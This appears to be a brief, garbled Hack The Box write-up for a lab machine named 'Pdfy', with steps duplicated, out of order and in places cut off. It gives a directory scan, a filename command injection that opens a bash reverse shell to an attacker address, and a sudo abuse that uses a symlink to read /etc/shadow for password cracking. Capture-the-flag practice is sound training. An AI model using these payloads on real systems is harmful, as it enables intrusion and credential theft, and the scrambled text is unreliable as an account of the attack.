Pdfy Htb Writeup Instant

sudo -l User www-data can run /usr/local/bin/pdfy as root without password. Running /usr/local/bin/pdfy asks for a PDF filename and converts it. It uses a system call to pdftotext – but with no sanitization. Exploitation Create a symlink to /etc/shadow as a PDF:

Crack root hash with John the Ripper:

Directory scan:

gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Found: /uploads , /index.php The PDF converter likely uses a command-line tool like pdftotext . A command injection vulnerability exists in the filename handling. Test Injection Create a simple PDF and rename it to: Pdfy Htb Writeup

sudo /usr/local/bin/pdfy Enter shadow.pdf → outputs /etc/shadow as text. sudo -l User www-data can run /usr/local/bin/pdfy as

mv shell.pdf "shell.pdf; bash -c 'bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1'" Upload → listener catches shell as www-data . Enumeration as www-data Check sudo rights: Exploitation Create a symlink to /etc/shadow as a

ln -s /etc/shadow shadow.pdf Run: